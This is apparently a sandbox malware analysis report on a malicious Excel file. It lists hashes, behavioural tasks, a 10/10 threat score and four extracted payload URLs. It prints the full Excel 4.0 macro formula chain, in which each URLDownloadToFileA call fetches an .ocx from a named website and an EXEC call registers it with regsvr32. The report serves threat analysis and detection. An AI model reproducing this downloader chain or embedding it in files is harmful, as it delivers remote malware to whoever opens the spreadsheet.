General
-
Target
ae72f6016f8929c7780693cadfb855ef.xlsx
-
Size
89KB
-
Sample
230628-vq7wpsad47
-
MD5
ae72f6016f8929c7780693cadfb855ef
-
SHA1
bda7fd78150a0103f3c2281d90074332ccfa8cde
-
SHA256
9f8b5f5da718fafb98de9b2128cd81fd720a37de6c755b81965ead358aeb912a
-
SHA512
5d0053bf1557fa4d236ddedf074562f7b86501b50c8595ecdcc44d99fe9201917e4c4649b9418cc952d4630db2bf036278e79013898e67fcd4ebe71bf6ea70e5
-
SSDEEP
1536:n6k3hOdsylKlgxopeiBNhZFGzE+cL2kdAdHuS4lcTO9Tv7UYdEJi9a2:6k3hOdsylKlgxopeiBNhZFGzE+cL2kd7
Behavioral task
behavioral1
Sample
ae72f6016f8929c7780693cadfb855ef.xls
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
ae72f6016f8929c7780693cadfb855ef.xls
Resource
win10v2004-20230621-en
Malware Config
Extracted
http://bruidsfotografie-breda.nl/cache/QPk/
http://www.chawkyfrenn.com/icon/JtT/
https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/
http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bruidsfotografie-breda.nl/cache/QPk/","..\phdg1.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.chawkyfrenn.com/icon/JtT/","..\phdg2.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/","..\phdg3.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/","..\phdg4.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx") =RETURN()
Extracted
http://bruidsfotografie-breda.nl/cache/QPk/
http://www.chawkyfrenn.com/icon/JtT/
Targets
-
-
Target
ae72f6016f8929c7780693cadfb855ef.xlsx
-
Size
89KB
-
MD5
ae72f6016f8929c7780693cadfb855ef
-
SHA1
bda7fd78150a0103f3c2281d90074332ccfa8cde
-
SHA256
9f8b5f5da718fafb98de9b2128cd81fd720a37de6c755b81965ead358aeb912a
-
SHA512
5d0053bf1557fa4d236ddedf074562f7b86501b50c8595ecdcc44d99fe9201917e4c4649b9418cc952d4630db2bf036278e79013898e67fcd4ebe71bf6ea70e5
-
SSDEEP
1536:n6k3hOdsylKlgxopeiBNhZFGzE+cL2kdAdHuS4lcTO9Tv7UYdEJi9a2:6k3hOdsylKlgxopeiBNhZFGzE+cL2kd7
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-